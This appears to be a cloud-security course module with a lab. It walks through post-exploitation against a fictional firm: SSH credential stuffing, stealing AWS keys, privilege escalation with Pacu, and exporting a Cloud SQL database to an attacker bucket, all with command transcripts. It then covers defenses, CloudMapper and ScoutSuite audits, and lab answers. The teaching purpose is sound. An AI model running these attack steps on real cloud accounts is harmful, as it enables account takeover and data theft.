Cloud Spotlight: Cloud Post-Exploitation

This course covers ways attackers exploit systems to access data. In this module, we’ll focus on what attackers do after gaining access, including using cloud user credentials.

root@allevil# hydra -t 4 -C credstuffing.txt ssh://192.168.1.73
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-05 06:06:22
[22][ssh] host: 192.168.1.73 login: jmerckle password: n8jFrErvpQHx
1 of 1 target successfully completed, 1 valid password found

root@allevil# ssh jmerckle@192.168.1.73
Password:
Last login: Mon Jul 5 06:02:08 2021 from 192.168.1.73
~ $ uname -mnrs
Darwin James-MBP.localdomain 20.5.0 x86_64
~ $ cat .aws/credentials
[default]
aws_access_key_id = AKIAJQHVNNNOUYTCFXWT
aws_secret_access_key = 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

In this module, we'll explore how attackers use familiar steps like scanning and exploitation to gain access to cloud resources. We'll assume they've obtained cloud IAM credentials (like AWS credentials) through an attack, and our goal is to learn how they act after gaining access so we can detect and defend against these threats.

Attacker Situation Report

aws sts get-caller-identity
  Basic access test; identify the username from the UserId

aws ec2 describe-instances
  Enumerate EC2 instances

aws s3 ls
  List S3 buckets

aws lambda list-functions
  List Lambda functions

aws iam list-roles
  List roles (permissions) associated with the user

aws iam list-users
  List other user accounts to target (privesc targets)

aws logs describe-log-groups
  Enumerate log groups (what is being monitored?)

root@allevil# aws sts get-caller-identity
{ 
"UserId": "AIDAQ3GCTAHP3NPIF7WKA",
"Account": "058390151647",
"Arn": "arn:aws:iam::058390151647:user/jmerckle" 
}

After finding cloud credentials, an attacker will check their access level using commands to list VMs, storage, serverless functions, users, roles, and logging settings.

The aws sts get-caller-identity command shows the identity associated with the credentials in use. Attackers often run it early to identify the username (from the Arn field) for later stages of the attack.
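
The steps above can be sketched in a few lines of Python: parse the get-caller-identity output and pull the username from the ARN. The sample values come from the transcript above; the parsing logic is the point, not the data.

```python
import json

# Sample output of `aws sts get-caller-identity` (values from the
# transcript above).
output = """{
    "UserId": "AIDAQ3GCTAHP3NPIF7WKA",
    "Account": "058390151647",
    "Arn": "arn:aws:iam::058390151647:user/jmerckle"
}"""

identity = json.loads(output)

# An IAM user ARN has the form arn:aws:iam::ACCOUNT:user/USERNAME, so
# the username is everything after the final "/".
username = identity["Arn"].rsplit("/", 1)[-1]
print(username, identity["Account"])  # jmerckle 058390151647
```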

This shows AWS enumeration using compromised credentials, but the same commands work for Azure and Google Cloud. You can find similar commands in the CloudPentestCheatsheets by Beau Bullock at https://github.com/dafthack/CloudPentestCheatsheets/.

Privilege Escalation Attacks

After checking privileges with stolen credentials, attackers try to get more access by exploiting weak spots in privilege settings or IAM policies.

This AWS policy lets helpdesk operators grant access to cloud assets. However, it's too permissive: because both the action and the resource are overly broad, an operator can grant any user any level of access, including administrator-level access.
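
The policy itself isn't reproduced here, but a hypothetical statement with the flaw described above, plus a quick check for it, might look like the following. The policy is illustrative, not the actual Falsimentis policy.

```python
# Hypothetical overly permissive helpdesk policy: both Action and
# Resource are wildcards, so an operator can attach any permission to
# any principal, including administrator access.
overly_permissive = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "iam:*", "Resource": "*"}
    ],
}

def flags_wildcard_allow(policy):
    """Return True if any Allow statement pairs a wildcard action
    with a wildcard resource."""
    for stmt in policy["Statement"]:
        if (stmt.get("Effect") == "Allow"
                and "*" in str(stmt.get("Action", ""))
                and stmt.get("Resource") == "*"):
            return True
    return False

print(flags_wildcard_allow(overly_permissive))  # True
```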

The attacker aims to find available privileges and chances to escalate access to cloud resources, including both provider and custom policies.

Pacu: AWS Interrogation and Attack Framework

Pacu is an exploitation framework for attacking AWS environments. It helps analysts run exploits, escalate privileges, and exfiltrate data.

Pacu includes several modules to find and exploit privilege escalation weaknesses. Two helpful modules are iam__enum_permissions and iam__privesc_scan.

root@allevil:~/pacu# ./cli.py
Pacu (jmerckle-falsimentis:No Keys Set) > import_keys jmerckle
Pacu (jmerckle-falsimentis:imported-jmerckle) > run iam__enum_permissions
Running module iam__enum_permissions...
Pacu (jmerckle-falsimentis:imported-jmerckle) > run iam__privesc_scan
Running module iam__privesc_scan...
[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan] CONFIRMED: PutUserPolicy
[iam__privesc_scan] Attempting confirmed privilege escalation methods...
[iam__privesc_scan] Successfully added an inline policy named dnr9s7e846!
You should now have administrator permissions.

To start Pacu, run the cli.py script and import the AWS user's keys by specifying the profile name (jmerckle). Pacu reads the AWS credentials from the default location and updates the prompt. Next, run iam__enum_permissions to enumerate the permissions associated with the current keys, then run iam__privesc_scan to identify and exploit IAM policy weaknesses for privileged access. In this case, Pacu finds a policy granting the PutUserPolicy privilege and exploits it, adding a new inline policy that grants administrator access.
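
As a sketch, the inline policy that a PutUserPolicy escalation attaches looks something like the following; the policy name and the exact document Pacu generates may differ.

```python
import json

# Administrator inline policy an attacker with iam:PutUserPolicy can
# attach to their own user. The document below is illustrative.
admin_policy = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

# Equivalent AWS CLI call (not executed here):
#   aws iam put-user-policy --user-name jmerckle \
#     --policy-name dnr9s7e846 --policy-document file://admin.json
print(json.dumps(admin_policy))
```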

More Privileges, More Data

After gaining higher access, attackers can reach more data. This includes cloud storage (such as AWS S3, Azure Blob Storage, and Google Cloud Storage), databases, and virtual machines. They can also access user data in services like Google Drive, OneDrive, and email.

Attackers might need to change the cloud setup to access data. Some resources can be downloaded directly, but others (like VM snapshots and key storage) often need to be moved to an intermediate storage first. This process increases the chances of detection since the attacker has to modify cloud settings.

Next, we'll look at several examples of tactics and techniques an attacker will use to obtain data from cloud systems.

Cloud Data Exfiltration

root@allevil# gcloud sql instances list
fm-research MYSQL_8_0 us-east1-c db-custom-4-26624 34.138.195.165 - RUNNABLE
root@allevil# gcloud sql databases list -i fm-research
ai utf8 utf8_general_ci
root@allevil# gsutil mb gs://sqlexfil
Creating gs://sqlexfil/...
root@allevil# gsutil acl ch -u jmerckle@falsimentis.com:WRITE gs://sqlexfil
Updated ACL on gs://sqlexfil/
root@allevil# gcloud sql export sql fm-research --database=ai gs://sqlexfil/sqldump.gz
Exporting Cloud SQL instance...done.
Exported [https://sqladmin.googleapis.com/sql/v1beta4/projects/cryptic-woods-298720/instances/fm-research] to [gs://sqlexfil/sqldump.gz].
root@allevil# gsutil cp gs://sqlexfil/sqldump.gz .
Copying gs://sqlexfil/sqldump.gz...
- [1 files][ 342.0 MiB/ 342.0 MiB]

Attackers with cloud admin access often target databases for valuable data. Here's how they might do it on Google Cloud Platform:

  1. The attacker finds database instances using gcloud sql instances list and sees a MySQL 8.0 database named fm-research.

  2. They check the database schemas with gcloud sql databases list -i fm-research.

  3. Since they can't download the database directly, they create a storage bucket named sqlexfil.

  4. The attacker gives themselves write access to the bucket using the gsutil acl command.

  5. They then export the fm-research database and schema to the bucket as a file called sqldump.gz.

  6. Finally, the attacker downloads the backup to their local system using gsutil.

The attacker doesn't always need special tools to target the cloud. In this case, they use Google's gcloud and gsutil tools, which are meant for system administrators, to exfiltrate a database backup.

As defenders, we can spot this kind of attack in a few ways. Google Cloud Audit Logs help us see the attacker’s actions, like checking databases and making backups. Changes in the attacker’s bucket permissions also create logs we should watch. We should review all buckets to find any unauthorized ones, which could signal an attack.
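
As a rough sketch of that hunting process, a defender might scan Cloud Audit Log entries for the method names used in the attack above. The entries here are simplified stand-ins for real records, which carry these fields inside protoPayload.

```python
# Method names associated with the exfiltration steps described above.
suspicious_methods = {
    "storage.buckets.create",      # new (possibly unauthorized) bucket
    "storage.setIamPermissions",   # bucket permission change
    "cloudsql.instances.export",   # database exported to a bucket
}

# Simplified audit log entries for illustration.
entries = [
    {"methodName": "cloudsql.instances.list", "principal": "jmerckle@falsimentis.com"},
    {"methodName": "storage.buckets.create", "principal": "jmerckle@falsimentis.com"},
    {"methodName": "cloudsql.instances.export", "principal": "jmerckle@falsimentis.com"},
]

hits = [e for e in entries if e["methodName"] in suspicious_methods]
for e in hits:
    print(e["principal"], e["methodName"])
```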

Attackers can exploit cloud services to find and steal data. For instance, if they gain higher access and become an eDiscovery Manager in Microsoft 365, they can use the compliance search tools to access sensitive information.

Compliance Search is a Microsoft 365 tool that helps auditors see how a company manages data. Attackers can also use it to find important information in Outlook, Teams, and OneDrive by searching for keywords, file types (like "annualreport.pptx"), email details, or sensitive labels (like "Credit Card Number").

Google Cloud Platform and AWS offer data access capabilities similar to Microsoft's compliance tools, but they're not as well integrated. In Google Workspace, tools like Google Vault, Content Compliance, the Audit API, and Gmail delegation let attackers search browser history, calendars, email, Google Drive files, Hangouts chats, and more.

Cloud providers allow users to export their data. Attackers with access to a user's Google account can use Google Takeout to retrieve information like location and browser history. This data is valuable to an attacker, but the export also triggers an email notification to the user, which may reveal the unauthorized access.

Cloud Post-Exploitation Defenses

To protect against cloud attacks, follow these tips:

  1. Know Your Setup: Identify cloud assets, user permissions, and policies.

  2. Check Permissions and Policies: Ensure policies are strict, limit user access, and apply the Principle of Least Privilege (POLP).

  3. Monitor Logs: Log and watch access and changes to spot unauthorized use.

Next, we’ll discuss tools and tips to help with these recommendations.

AWS: CloudMapper

CloudMapper is a free tool that helps visualize and audit AWS cloud setups. It creates dynamic network maps showing how AWS assets are connected. You can find it at https://github.com/duo-labs/cloudmapper.

$ cloudmapper.py prepare --config config.json --account acctname
$ cloudmapper.py report --config config.json --account acctname
$ cloudmapper.py webserver

To use CloudMapper, you need an AWS account with SecurityAudit and ViewOnlyAccess permissions. You'll also need a JSON file that has the environment name (like "prod"), AWS account ID, and CIDR IP address ranges with names (like "SF Office"). The cloudmapper.py script uses this file to collect data, make a map, and start a web server on TCP/8000 for interaction.
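
A minimal config.json following that description might look like this. The account ID and CIDR values are placeholders, and the exact schema should be checked against the CloudMapper documentation.

```python
import json

# Hypothetical CloudMapper config.json: an environment name, the AWS
# account ID, and named CIDR ranges.
config = json.loads("""{
  "accounts": [
    {"id": "123456789012", "name": "prod", "default": true}
  ],
  "cidrs": {
    "203.0.113.0/24": {"name": "SF Office"}
  }
}""")
print(config["accounts"][0]["name"])  # prod
```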

CloudMapper helps check AWS security by finding vulnerabilities, privilege escalations, threats to public assets, and unused resources. For more details, visit https://summitroute.com/blog/2019/03/04/cloudmapper_report_generation/.

CloudMapper is for AWS, but there are other tools for different clouds. Use AzViz for Azure (https://github.com/PrateekKumarSingh/AzViz) and Google Network Topology for Google Cloud (https://cloud.google.com/network-intelligence-center/docs/network-topology). Cloudcraft can map multiple clouds with both manual and automated options (https://www.cloudcraft.co/).

ScoutSuite (AWS, GCP, Azure)

CloudMapper helps visualize cloud environments for assessment, while ScoutSuite focuses on finding vulnerabilities. It works with AWS, Google Cloud, Azure, Oracle Cloud, and Alibaba Cloud, using audit credentials for thorough assessments. ScoutSuite produces both an HTML report and a JSON file with the findings.

ScoutSuite has hundreds of rules for finding cloud vulnerabilities in its free version. There’s also a freemium version with extra scanning features and a paid version with more detailed analysis and reporting.

The HTML report from ScoutSuite is easy to use, but the JSON results are also helpful for finding vulnerabilities. For instance, the JSON files can reveal sensitive environment variables, as shown in the example below.

$ tail -n +2 scoutsuite_results_aws-pseudovision.js | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn,.env_variables'
"arn:aws:lambda:us-east-1:058390151647:function:AlexaWhatDayIsIt"
{
"app_secret": "swXQICPRRkftVYtVsmzE"
}

You can find more helpful JQ queries for ScoutSuite scan results in Beau Bullock's Cloud Pentest Cheatsheets project at this link: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/OtherTools.md
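
The same filter can be expressed in Python; here it runs against a trimmed, hand-built sample that mirrors the structure the jq query above walks (the values come from the example output).

```python
import json

results = json.loads("""{
  "services": {"awslambda": {"regions": {"us-east-1": {"functions": {
    "AlexaWhatDayIsIt": {
      "arn": "arn:aws:lambda:us-east-1:058390151647:function:AlexaWhatDayIsIt",
      "env_variables": {"app_secret": "swXQICPRRkftVYtVsmzE"}
    }
  }}}}}
}""")

# Walk regions -> functions and report any function with environment
# variables set, mirroring the jq select() above.
for region in results["services"]["awslambda"]["regions"].values():
    for fn in region["functions"].values():
        if fn["env_variables"]:
            print(fn["arn"], fn["env_variables"])
```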

Cloud Logging

Logging setup varies by platform and organization. Check your cloud provider's documentation for specific logging recommendations, but also keep in mind some general tips.

Store your logs in a separate cloud account's write-only bucket. This way, even if someone has access to your main account, they can't change the logs. If you need logs for your main account, make sure to copy them to the second account for analysis.
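
For AWS, that pattern can be expressed as a bucket policy in the logging account. This sketch uses a placeholder account ID and a hypothetical bucket name.

```python
import json

# The production account (111111111111, placeholder) may write log
# objects into the logging account's bucket, but an explicit Deny
# blocks it from reading or deleting them.
log_bucket_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowLogDelivery",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::central-log-archive/*",
        },
        {
            "Sid": "DenyReadAndDelete",
            "Effect": "Deny",
            "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
            "Action": ["s3:GetObject", "s3:DeleteObject"],
            "Resource": "arn:aws:s3:::central-log-archive/*",
        },
    ],
}
print(json.dumps(log_bucket_policy, indent=2))
```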

Cloud logging should have:

  • Netflow logs for cloud connections (source, destination, port, protocol, packet and byte counts, start and end times)

  • Cloud storage access logs (timestamp, requester IP, action, response, response size)

  • Logs of all API access attempts for sensitive resources (with response status)

  • Logs of failed API requests for non-sensitive resources

Use your cloud provider's tools to watch and manage your logs. Amazon Detective, Azure Sentinel, and GCP Security Command Center help you quickly analyze logging data for threat hunting and incident response.

Log file retention is a debated issue. Some believe logs should be kept for 30-90 days, but legal requirements can change this. Keeping logs too long can complicate analysis. It's best to keep logs as long as they're useful. Before deleting old logs, consider moving them to cheaper, offline storage like Amazon Glacier or Google Cloud Storage Archive.
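
As an example of the archival step, an S3 lifecycle rule can move log objects to Glacier and eventually expire them. The day counts here are illustrative; retention must follow your legal and operational requirements.

```python
# Keep logs in standard storage for 90 days, transition them to
# Glacier, and delete them after a year.
lifecycle_config = {
    "Rules": [
        {
            "ID": "archive-then-expire-logs",
            "Filter": {"Prefix": "logs/"},
            "Status": "Enabled",
            "Transitions": [{"Days": 90, "StorageClass": "GLACIER"}],
            "Expiration": {"Days": 365},
        }
    ]
}
print(lifecycle_config["Rules"][0]["ID"])
```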

Lab 5.6: Cloud Configuration Assessment

In this lab, we will evaluate the Falsimentis AWS cloud assessment data generated by CloudMapper and ScoutSuite.

This lab focuses on defense and helps us review cloud configuration scans from CloudMapper and ScoutSuite. Both tools assess configuration vulnerabilities, but they have different features and support different cloud providers. By using both, we'll learn to choose the best tool for our cloud assessment needs.

CloudMapper is configured using a Python virtual environment. To use CloudMapper, let's activate the Python virtual environment using the source command.

source venv/bin/activate

In this lab, we've set up the Falsimentis network config for CloudMapper. First, let's check the config.json file using the cat command.

cat config.json

The CloudMapper config file gives friendly names to network numbers and includes the AWS account ID and name. This account ID matches the AWS CLI credentials file.

cat ~/.aws/credentials

To use CloudMapper, we need an AWS account with SecurityAudit and ViewOnlyAccess permissions. After setting the account ID in the config.json file and adding our AWS CLI credentials, we'll run the collect command to gather the needed information.

python3 cloudmapper.py collect --config config.json

CloudMapper data is saved in /opt/cloudmapper/account-data with the profile name as a folder. Let's use ls to check the directory with the Falsimentis data.

ls account-data/
ls account-data/falsimentis/

Next, we'll prepare the data for analysis and inspection by running the CloudMapper prepare function.

python3 cloudmapper.py prepare --config config.json

Now that the cloud configuration data is ready, we can begin reviewing the information.

CloudMapper was made to show how devices in a network are connected. To view the network data, let's use the CloudMapper webserver function.

python3 cloudmapper.py webserver

Let's open Firefox and go to http://127.0.0.1:8000. After a few seconds, we'll see a network map like the example shown.

The network diagram shows how endpoints are connected, grouped by AWS region, with labels based on the config.json settings. It includes several EC2 instances and Virtual Private Clouds (VPCs) across different availability zones in the us-west-1 region (such as us-west-1a and us-west-1c).

The Welcome to CloudMapper window lets us see more info about the different nodes in AWS. Let's click on the Dev Webserver node and expand the Details row for more information.

Let's look at the details row for the selected node and answer the following questions.

1) What is the public IP address of the selected node?

Answer: 13.57.56.39

2) What is the instance type for the node?

Answer: t2.micro

3) What is the name of the security group controlling network access to the node?

Answer: morning-ssh-http

4) What sensitive information is disclosed in the DB Server 1 node tags?

The Tags section of the DB Server 1 node has key/value pairs, including an AWS access key and secret key. Developers often use tags to send information to the VM, which can include sensitive keys.

Let's close the Firefox tab with CloudMapper results and go back to the terminal. Press CTRL+C to stop the CloudMapper web server and get back to the command prompt.

CloudMapper can create a network map and an assessment report. To generate the report, we'll use the CloudMapper report command in the terminal.

python3 cloudmapper.py report --config config.json --accounts falsimentis

Let's open the CloudMapper report in Firefox.

firefox web/account-data/report.html

In Firefox, let's go to the Public network resources section of the report. CloudMapper will show the public resources by type. For Falsimentis, there are 9 EC2 instances listed.

The bar chart shows how many public resources are allocated to different port ranges in security groups.

Public resources are divided into four groups based on port ranges. The first two groups allow access to TCP ports 22 and 80. The third group includes access to TCP ports 22 and 4444, often linked to Metasploit. The last group covers a wider range, including port 80 and ports 443 to 4443, which may be a typo that mistakenly allows more ports than intended.

CloudMapper finds weaknesses in AWS settings, like a vulnerability scanner, but only looks at the configuration, not the actual assets. Let's check the "Links to findings" section in the CloudMapper report for details.

5) Which user does not have MFA configured?

Answer: falsimentis

CloudMapper provides helpful visuals but doesn’t offer a detailed security report and has limited ability to spot problems. To improve on what CloudMapper provides, we'll also look into ScoutSuite, a tool for assessing cloud configurations across multiple platforms.

The ScoutSuite data for this lab has already been collected.

The ScoutSuite report is in /home/sec504/labs/scoutsuite-report/aws-912182608192.html. Let's open it in Firefox as shown.

firefox /home/sec504/labs/scoutsuite-report/aws-912182608192.html

ScoutSuite reviewed various services for the cloud provider in the Falsimentis report. It found high-risk issues in EC2 and IAM, and medium-risk issues in S3 and VPC.

6) Which users are granted IAM PassRole policy privileges?

In the IAM findings, the "Managed Policy Allows 'iam:PassRole' For All Resources" finding identifies the users cannets, fpracall, and mrawes as having access to this privileged policy through the AWSElasticBeanstalk policy.

Answer: cannets, fpracall, and mrawes

7) Which VPC subnet is not configured to use a flow log?

Answer: Dev Webserver, Unprovisioned Wombat instances

ScoutSuite generates a JSON file along with the HTML report, containing extra findings. This file can help us access more details not shown in the report. We can find the JSON report in the ~/labs/scoutsuite-report/scoutsuite-results folder. Let's go to that directory and list the files.

The ScoutSuite report is a .js file with the first line assigning the scan results as a JSON to the scoutsuite_results variable. We can view the first 40 characters of the scan result using the head command.

head -c 40 scoutsuite_results_aws-912182608192.js ; echo

To use JQ to read the JSON results, we need to skip the first line of the JavaScript file. We can do this using the tail command.

tail -n +2 scoutsuite_results_aws-912182608192.js | jq '.' | more
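
The same first-line skip works in Python, which is handy if jq isn't available. The file content below is a tiny stand-in for the real report.

```python
import json

# First line is the JavaScript assignment; everything after it is JSON.
js_content = 'scoutsuite_results =\n{"account_id": "912182608192"}\n'

_, _, json_text = js_content.partition("\n")  # drop line 1, keep the rest
results = json.loads(json_text)
print(results["account_id"])  # 912182608192
```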

Using JQ to parse ScoutSuite results, we can target specific data. For instance, the JQ query here helps us view all tags for EC2 instances.

tail -n +2 scoutsuite_results_aws-912182608192.js | jq '.services.ec2.regions[].vpcs[].instances[] | .name, .Tags'

8) What non-AWS key value is disclosed in the EC2 instance tag values?

tail -n +2 scoutsuite_results_aws-912182608192.js | jq '.services.ec2.regions[].vpcs[].instances[] | .name, .Tags'

In this lab, we examined two cloud assessment tools: CloudMapper (for AWS) and ScoutSuite (for multiple providers). Both tools help assess cloud configurations, but they present information differently and offer varying levels of security analysis.

We can use these tools to check the cloud environment and see how its assets are set up and if they have any security weaknesses. In the lab, we looked at the Falsimentis AWS setup and found some risks that could harm the network.
